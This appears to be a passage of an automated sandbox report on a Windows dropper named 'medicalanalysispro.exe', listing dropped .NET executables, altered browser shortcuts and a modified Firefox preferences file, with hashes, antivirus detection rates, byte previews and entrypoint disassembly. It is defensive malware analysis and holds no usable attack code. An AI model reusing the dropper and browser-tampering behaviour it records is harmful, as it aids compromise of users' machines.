                                                                                                                                                                                                                                                                                                            SHA-512:10D3E068D401C9C9836DDD9355670114AA982A0CA6CACC34FA3DDD4FF21BDF7FE62083E8A46F7DE667ED228E8B6281C8F65EB531EDDF97F6612F091DA5C9342D
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe

                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\medicalanalysispro.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):93696
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.714493816202374
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:1536:V6DdyQDw4KX9wG0ess6PHZGwZAnK+dJr/eXYvJGrm4M/4YyUM:oVcwKD6PHMOAKVXYvJCm4M/Ryl
                                                                                                                                                                                                                                                                                                            MD5:443B43ADCB78164D40C977ABAC54C18E
                                                                                                                                                                                                                                                                                                            SHA1:84E8738D90770806B8533E5A412FEAB161DE2382
                                                                                                                                                                                                                                                                                                            SHA-256:8E2EC352E0EC1212011FEFD1ABE73FCBBCE42BEC907525922BA7C64EAF26BA24
                                                                                                                                                                                                                                                                                                            SHA-512:80232FC1C89066BA24F22AAAF00FB49BA13917C938C4B8B64933617EE3DE844BE2CD3A9DC2426DA846750A1AF50E933B553DC5A5C4DBB2D33332FF202532F8D1
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....^g.................d............... ........@.. ....................................`....................................K.................................................................................... ............... ..H............text...$c... ...d.................. ..`.rsrc................f..............@..@.reloc...............l..............@..B........................H.......`...d............................................................*...(....*..(....*..0..O....... ........8........E..../.......8*...r...p(....& ....~....{....:....& ....8....*.&~.......*...~....*..(....(....*.0..[....... ........8........E........................'...8....... ....~....{....:....& ....8...........o...... ....~....{....:....& ....8........E....+...............8&...s...... ....~....{....9....& ....8..........s...... ....~....{....:....& ....8........E....

                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe

                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\medicalanalysispro.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):25600
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.720210063776194
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:768:7cJtQnNnab3OwLhAETjZn8eAemp/wDmrDpz+spCl:7cJinNab3ZSkjZn8eAfp/wDqljpCl
                                                                                                                                                                                                                                                                                                            MD5:2DBC39DCE4C3B66019E84A28A342EAD0
                                                                                                                                                                                                                                                                                                            SHA1:7AB924FE7875C17BFA2700678833C612C487441B
                                                                                                                                                                                                                                                                                                            SHA-256:DDCFD38B862FDB8E8BD1C34B7D1FD3928E1A5EDABE0CB4A627717FC89F5F6186
                                                                                                                                                                                                                                                                                                            SHA-512:D4AB406B5D85D42C1572D4E23DC71342EEAF1473A56045BE0189AF8946C99E70A274FAAB6135A1B08205422B31B4917A45146674FDF895A115CE96F7D76E84F6
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@...............0..Z...........x... ........@.. ....................................@..................................w..O....................................w............................................... ............... ..H............text....X... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B.................w......H........8..@4...........l...............................................0..........(....o.....+g..(......o,....o....(......o,....o0...(....o.....+...(.........(......&....(....-...........o.......&....(....-...........o.....*...4....I..S........>.#a..........\q..........t........0..E.......r...p(......(....,.r...p(......(....-..( ...%-.&.*..0...%..\.(!...*.*....0..........s"..........%.(....r%..p(#....%..*($....s%...%rC..p..($...rc..prs..p(&...o'...%r...p..($...r...p((...o'.

                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Tmp1C31.tmp

                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):2540
                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.801552142126602
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:48:CDAZse4GVajjgsrMM7wEIyxduDwLHXsZ5z/C2iJQ7sKXhVFm1:C+sfGEjgsgM7lIKuK3qB6HJQ7BFm
                                                                                                                                                                                                                                                                                                            MD5:CBC6B2AD4BF883EA7ECB41D8D86B0964
                                                                                                                                                                                                                                                                                                            SHA1:3051043976773ABFC145A23942B42E4C7CAC5A1C
                                                                                                                                                                                                                                                                                                            SHA-256:C8844BA7CA7DF3C75532044792065C3D2B742C389FC9FA1A6E2776ED425917AF
                                                                                                                                                                                                                                                                                                            SHA-512:355B1E180D067ABAAB69F1F51CF0776DEE7156156195094825A1BA7FAC3BCF7AB303B5D68BE373878F400CD34EC9061DC549706B8AD344E66AC8968DAA7E812F
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Preview:0......0.....*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0........J..........+"J.).V9...,...:'.......>.i..$V.Y.R..w......?)fA....l..B.I....W....d}.uw..),}.-..S......Z.fM.%<.R..Ln.<.U.]]....m.QS..R4..T.....)s>.(@.<C...>.../.F............|.i.:.._..1...@ns.<...!....O.'g.<X*.........ctf.=.........4.......?e......G}..N~.>P.....A^.e...8.*]..Z...l-se....g ..M;....@w....G...E...)...\.}W.lP...z..X.J..%!I..F&l....Kc.Ve$;........!.]..\...r..)..B.....< .>>.5O{%..$.....?..\.7.&.......r....5 :.k......s-S.{z.pZ...QY0.tV0....H.....0.8..Jf..V..W?.....v.).k$ag.J3f"..t...3)....v............v.j}.)4j.^r..r.....n._"o.j..t0.W......O.zH...6.$..).gd...Z.b..40..M.f...A....C....v.w..}.....r.3.e..5..9..|.9N..{rCN{..6.k..W.........h.w.uEQR.AQI@-l..+....J_....s{.....}2p.......O.E.....}.76".x6.,.M./.8.u.....WM..*....?..%.....\@mU.Kr....]......{..#*...A.).........E.`..q..E............o..5...f...wR...H.9.z..|q....0.uI....

                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Tmp1C61.tmp

                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):2540
                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.801552142126602
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:48:CDAZse4GVajjgsrMM7wEIyxduDwLHXsZ5z/C2iJQ7sKXhVFm1:C+sfGEjgsgM7lIKuK3qB6HJQ7BFm
                                                                                                                                                                                                                                                                                                            MD5:CBC6B2AD4BF883EA7ECB41D8D86B0964
                                                                                                                                                                                                                                                                                                            SHA1:3051043976773ABFC145A23942B42E4C7CAC5A1C
                                                                                                                                                                                                                                                                                                            SHA-256:C8844BA7CA7DF3C75532044792065C3D2B742C389FC9FA1A6E2776ED425917AF
                                                                                                                                                                                                                                                                                                            SHA-512:355B1E180D067ABAAB69F1F51CF0776DEE7156156195094825A1BA7FAC3BCF7AB303B5D68BE373878F400CD34EC9061DC549706B8AD344E66AC8968DAA7E812F
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Preview:0......0.....*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0........J..........+"J.).V9...,...:'.......>.i..$V.Y.R..w......?)fA....l..B.I....W....d}.uw..),}.-..S......Z.fM.%<.R..Ln.<.U.]]....m.QS..R4..T.....)s>.(@.<C...>.../.F............|.i.:.._..1...@ns.<...!....O.'g.<X*.........ctf.=.........4.......?e......G}..N~.>P.....A^.e...8.*]..Z...l-se....g ..M;....@w....G...E...)...\.}W.lP...z..X.J..%!I..F&l....Kc.Ve$;........!.]..\...r..)..B.....< .>>.5O{%..$.....?..\.7.&.......r....5 :.k......s-S.{z.pZ...QY0.tV0....H.....0.8..Jf..V..W?.....v.).k$ag.J3f"..t...3)....v............v.j}.)4j.^r..r.....n._"o.j..t0.W......O.zH...6.$..).gd...Z.b..40..M.f...A....C....v.w..}.....r.3.e..5..9..|.9N..{rCN{..6.k..W.........h.w.uEQR.AQI@-l..+....J_....s{.....}2p.......O.E.....}.76".x6.,.M./.8.u.....WM..*....?..%.....\@mU.Kr....]......{..#*...A.).........E.`..q..E............o..5...f...wR...H.9.z..|q....0.uI....

                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk

                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 10:50:01 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):2700
                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.665672983407806
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:48:8SLdpT63ERYrnvsYd/KRkdAoEu00dAKR+/KR2eHygP:8SbEvEuseHy
                                                                                                                                                                                                                                                                                                            MD5:55B12753AD117AD20DB07C11F0D76F4D
                                                                                                                                                                                                                                                                                                            SHA1:675011C17A48D882E3FFAEA8C8AF34B6B91CDD8A
                                                                                                                                                                                                                                                                                                            SHA-256:0F5EDB190021E2E8803368CE5771AEB4832E3C840661D21281D69C9AA24258A7
                                                                                                                                                                                                                                                                                                            SHA-512:02615221D3DCBDB7F77B7D55168EA0AD9DEFE757F4C1BA485DF19AD9ACCDD019B45725CB080EBF3803F393241DBF60790DA282BE1E2FF4D60F5ACC87BA4D4C69
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Preview:L..................F.@.. ......,....Tb.........q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....CW}W..PROGRA~1..t......O.ICW}W....B...............J.....7...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VCW.W....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VCW.V....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VCW.W..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VCW.W..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.M.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t

                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk

                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Tue Oct 3 10:48:05 2023, atime=Thu Aug 5 05:45:01 2021, length=3311504, window=hide
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):2792
                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.7477649428831614
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:48:8UZndO5fLswOnzTdRdiu0qdLXuHj0PkZyl7:88Qu5uD0PkZy
                                                                                                                                                                                                                                                                                                            MD5:F70F632D6574EBA457A1C06C0487B277
                                                                                                                                                                                                                                                                                                            SHA1:49EAD7402F55B2AA51604E434932EA189AEAF07B
                                                                                                                                                                                                                                                                                                            SHA-256:5CD51F4573ACDDA49CC34E9B264998824EA62F723D6590C5123719376209B34B
                                                                                                                                                                                                                                                                                                            SHA-512:B977D072309BF8DF38CEE21117F77C87B7AAFA11D123C56EC5A6BB645ED2B58203F20C1FA0570ADE5D9E032EC5B2C06B387F435BB77C475126733CC013465AF0
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Preview:L..................F.@.. .....|.K.....x......zj.....2.....................1....P.O. .:i.....+00.../C:\.....................1.....CW.X..PROGRA~2.........O.ICW.X....................V.......E.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....CW.?..MICROS~1..D......(Ux.CW.U..........................w.o.M.i.c.r.o.s.o.f.t.....N.1.....CW.?0.Edge..:.......S8.CW.U...........................f .E.d.g.e.....`.1.....CW.H0.APPLIC~1..H.......S8.CW.U...........................L).A.p.p.l.i.c.a.t.i.o.n.....`.2...2..S.5 .msedge.exe..F.......S8.CW.V...........................t..m.s.e.d.g.e...e.x.e.......k...............-.......j............F.......C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe....B.r.o.w.s.e. .t.h.e. .w.e.b.N.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.1.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.

                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk

                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 09:48:42 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):2741
                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.6928598257416843
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:48:8S7dBT6DpRYrnv3d/KRkdAoEu00dAKR+/KR2egy8Ec:8SnhhEusegyd
                                                                                                                                                                                                                                                                                                            MD5:3EDBFEBDDC5AB91DF7729F0AD9187680
                                                                                                                                                                                                                                                                                                            SHA1:F5CA6743A4B608666CF914DB1BB637E4745A8B6F
                                                                                                                                                                                                                                                                                                            SHA-256:FAF4FB3ABCC803500862DEC8F4FFE062018EAB5577D6E23F0B34922A29B60480
                                                                                                                                                                                                                                                                                                            SHA-512:FB7601FC78E109B65AD58F48CC218BA74FC8CE824C5A883A7E8D07E06F337BD8BA9F5D1B2E6437065CA85B81B934C36783759D54E2194838CF36BE4ED0DDE707
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Preview:L..................F.@.. ......,.....=.,.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....CW.V..PROGRA~1..t......O.ICW.V....B...............J.....p+j.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VCW.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VCW.V....M.....................G-..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VCW.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VCW.V..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p

                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js

                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):9955
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.539546590334843
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJST:yegqumcwQq
                                                                                                                                                                                                                                                                                                            MD5:9CCCA79A619F528AF77B8785D4D1F467
                                                                                                                                                                                                                                                                                                            SHA1:43FD8C56D81FB8B267E50E988026E727644A97DF
                                                                                                                                                                                                                                                                                                            SHA-256:72817F597962FAA296D05C888465FF3A2FB85E36D9780E9DEC27BA2930D45ACF
                                                                                                                                                                                                                                                                                                            SHA-512:99C12B69D26454987085FD18E94AA658B119107CD71C8BCA1059B5E0D4497D42D864DD2A775B778A80C1C561ED37DB5C77032644BAEAE7EED1EC888F99DAD32B
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.174815206205745
                                                                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                            File name:medicalanalysispro.exe
                                                                                                                                                                                                                                                                                                            File size:206'336 bytes
                                                                                                                                                                                                                                                                                                            MD5:178a2a89cb76efea6df50cc884991226
                                                                                                                                                                                                                                                                                                            SHA1:918b309ab3ff30be807e073df80596eff5800ced
                                                                                                                                                                                                                                                                                                            SHA256:357829b06c1c185e44efa729dd8671487a43778a3be1b6f46c7956f4d4cb49e2
                                                                                                                                                                                                                                                                                                            SHA512:e72605c87be8f7a2a0aeac0af61e7ef329effcb74c05c678692ea7a80f1086d1a4dd1217d6cdf463a12252d80062f052e8581eddea9bacd959bf620aca01566a
                                                                                                                                                                                                                                                                                                            SSDEEP:3072:/ahKyd2n31e5GWp1icKAArDZz4N9GhbkrNEk1ek/Wt5OGNMJA/T:/ahO2p0yN90QE8/Wt4ez7
                                                                                                                                                                                                                                                                                                            TLSH:B014AE0A63E420B6E4B957B499F302935A32BCB15B7582FF22D4D57E0E236C0A532F17
                                                                                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."

                                                                                                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                                                                                                            Icon Hash:3b6120282c4c5a1f

                                                                                                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                            Entrypoint:0x140008200
                                                                                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                            Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                            OS Version Major:10
                                                                                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                                                                                            File Version Major:10
                                                                                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                                                                                            Subsystem Version Major:10
                                                                                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                            Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1

                                                                                                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                                                                                                            call 00007FD434E6DE90h
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                                                                                                            jmp 00007FD434E6D73Bh
                                                                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            mov dword ptr [esp+08h], ebx
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            mov dword ptr [esp+10h], edi
                                                                                                                                                                                                                                                                                                            inc ecx
                                                                                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            sub esp, 000000B0h
                                                                                                                                                                                                                                                                                                            and dword ptr [esp+20h], 00000000h
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                                                                                                            call dword ptr [000011CDh]
                                                                                                                                                                                                                                                                                                            nop
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            mov ebx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                                                            xor edi, edi
                                                                                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            cmpxchg dword ptr [00004922h], ebx
                                                                                                                                                                                                                                                                                                            je 00007FD434E6D73Ch
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            cmp eax, ebx
                                                                                                                                                                                                                                                                                                            jne 00007FD434E6D74Ch
                                                                                                                                                                                                                                                                                                            mov edi, 00000001h
                                                                                                                                                                                                                                                                                                            mov eax, dword ptr [00004918h]
                                                                                                                                                                                                                                                                                                            cmp eax, 01h
                                                                                                                                                                                                                                                                                                            jne 00007FD434E6D749h
                                                                                                                                                                                                                                                                                                            lea ecx, dword ptr [eax+1Eh]
                                                                                                                                                                                                                                                                                                            call 00007FD434E6DD23h
                                                                                                                                                                                                                                                                                                            jmp 00007FD434E6D7ACh
                                                                                                                                                                                                                                                                                                            mov ecx, 000003E8h
                                                                                                                                                                                                                                                                                                            call dword ptr [0000117Eh]
                                                                                                                                                                                                                                                                                                            jmp 00007FD434E6D6F9h
                                                                                                                                                                                                                                                                                                            mov eax, dword ptr [000048F6h]
                                                                                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                                                                                            jne 00007FD434E6D78Bh
                                                                                                                                                                                                                                                                                                            mov dword ptr [000048E8h], 00000001h
                                                                                                                                                                                                                                                                                                            dec esp
                                                                                                                                                                                                                                                                                                            lea esi, dword ptr [000013E9h]
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            lea ebx, dword ptr [000013CAh]
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            mov dword ptr [esp+30h], ebx
                                                                                                                                                                                                                                                                                                            mov dword ptr [esp+24h], eax
                                                                                                                                                                                                                                                                                                            dec ecx
                                                                                                                                                                                                                                                                                                            cmp ebx, esi
                                                                                                                                                                                                                                                                                                            jnc 00007FD434E6D757h
                                                                                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                                                                                            jne 00007FD434E6D757h
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            cmp dword ptr [ebx], 00000000h
                                                                                                                                                                                                                                                                                                            je 00007FD434E6D742h
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            mov eax, dword ptr [ebx]
                                                                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                                                                            mov ecx, dword ptr [00001388h]

                                                                                                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa23c0xb4.rdata
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x274fc.rsrc
